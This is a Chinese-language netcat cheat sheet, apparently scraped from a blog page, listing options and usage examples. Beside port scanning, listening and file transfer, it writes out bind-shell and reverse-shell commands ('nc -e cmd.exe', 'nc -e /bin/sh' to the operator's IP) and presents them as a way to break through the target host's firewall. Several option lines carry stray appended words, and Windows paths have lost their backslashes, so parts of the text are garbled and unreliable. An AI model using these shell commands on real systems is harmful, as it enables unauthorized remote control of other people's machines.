NC瑞士軍刀

NetCat參數說明:

-h 查看幫助信息linux

-d 後臺模式shell

-e prog程序重定向,一但鏈接就執行[危險]bash

-i <延遲秒數> 設置時間間隔,以便傳送信息及掃描通訊端口; unix

-l 監聽模式,用於入站鏈接code

-L 監聽模式,鏈接關閉後仍然繼續監聽,直到CTR+Crem

-n IP地址,不能用域名cmd

-o file 記錄16進制的傳輸域名

-p <端口> 本地端口號 class

-r 隨機本地及遠程端口test

-s 設置本地主機送出數據包的IP地址

-t 使用Telnet交互方式

-u UDP模式

-v 詳細輸出,用-vv將更詳細

-w 數字 timeout延時間隔

-z 將輸入,輸出關掉(用於掃錨時)

基本用法:

  • 鏈接到192.168.0.1主機的80端口

    nc -nvv 192.168.0.1 80
  • 開啓本機的TCP 80端口並監聽

    nc -l -p 80
  • 掃錨192.168.0.1的80-1024端口

    nc -nvv -w2 -z 192.168.0.1 80-1024
  • 綁定remote主機的cmdshell在remote的TCP 5354端口

    nc -l -p 5354 -t -e c:winntsystem32cmd.exe
  • 綁定remote主機的cmdshell並反向鏈接192.168.0.2的5354端口

    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354

高級用法:

  • 開啓並不停地監聽80端口,直到CTR+C爲止

    nc -L -p 80
  • 開啓並不停地監聽80端口,直到CTR+C,同時把結果輸出到c:\log.txt

    nc -L -p 80 > c:\log.txt 做爲蜜罐用2
  • 開啓並不停地監聽80端口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件做用

    nc -L -p 80 < c:\honeyport.txt 做爲蜜罐用3-1
  • 開啓並不停地監聽80端口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件做用

    type.exe c:\honeyport | nc -L -p 80 做爲蜜罐用3-2
  • 開啓並不停地監聽本機端口,直到CTR+C爲止

    nc -l -p 本機端口
  • 在對方 win2000+主機上用:

    nc -e cmd.exe 本機IP -p 本機端口
  • linux,unix上,反向鏈接突破對方主機的防火牆

    nc -e /bin/sh 本機IP -p 本機端口
  • 本機上用

    nc -d -l -p 本機端口 < 要傳送的文件路徑及名稱
  • 在對方主機上用

    nc -vv 本機IP 本機端口 > 存放文件的路徑及名稱 傳送文件到對方主機

備 注:

| 管道命令

< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令

@ 表示執行@後面的命令,但不會顯示出來(後臺執行);例:@dir c:\winnt >> d:\log.txt 意思是:後臺執行dir,並把結果存在d:\log.txt中

與>>的區別  ">"指:覆蓋;">>"指:保存到(添加到)。

如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是由於第二次的結果把第一次的覆蓋了。

相關文章
相關標籤/搜索